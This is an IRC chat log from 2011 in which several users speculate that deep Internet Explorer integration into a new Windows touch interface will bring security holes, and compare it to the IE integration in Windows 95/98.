Trident Jun 04 18:38:34 <joepie91> to render the new touch UI shit Jun 04 18:38:38 <joepie91> aka internet explorer Jun 04 18:38:46 <joepie91> with only support for HTML5 and Silverlight Jun 04 18:38:51 <joepie91> as well as .NET integration Jun 04 18:38:58 <joepie91> that IE will thus be integrated deeply into the system Jun 04 18:38:59 <trollpoll> silverlight... who the fuck uses this shit? Jun 04 18:39:00 <pwnsauce> it supports vb6 binaries still Jun 04 18:39:03 <joepie91> not only meaning you can't get rid of it Jun 04 18:39:05 <pwnsauce> we tested Jun 04 18:39:08 <joepie91> but also meaning

Jun 04 18:39:16 <joepie91> that IE is yet again deeply integrated into the system Jun 04 18:39:20 <joepie91> introducing a buttload of new vulnerabilities Jun 04 18:39:34 <joepie91> let's see when the final release comes out, if t he above is accurate. Jun 04 18:39:36 <trollpoll> good point Jun 04 18:39:43 <joepie91> they did it before, wouldn't be surprised if the y did it again. Jun 04 18:40:00 <joepie91> remember windows 95/98(?) and the IE integraten? Jun 04 18:40:03 <joepie91> integration* Jun 04 18:40:15 <trollpoll> microsoft has imrpoved their security very very well in tha last few years Jun 04 18:40:43 <joepie91> yes, but a bit less bad doesn't make it good Jun 04 18:41:02 <joepie91> if IE is gonna be this deeply integrated, I guar antee you that there will be shitloads of holes Jun 04 18:41:04 <trollpoll> but obviously, being the most used SO in the wor ld, makes the cake bigger for researchers Jun 04 18:41:52 <pwnsauce> MORE CAKE! **** ENDING LOGGING AT Sat Jun 4 18:42:02 2011

Das könnte Ihnen auch gefallen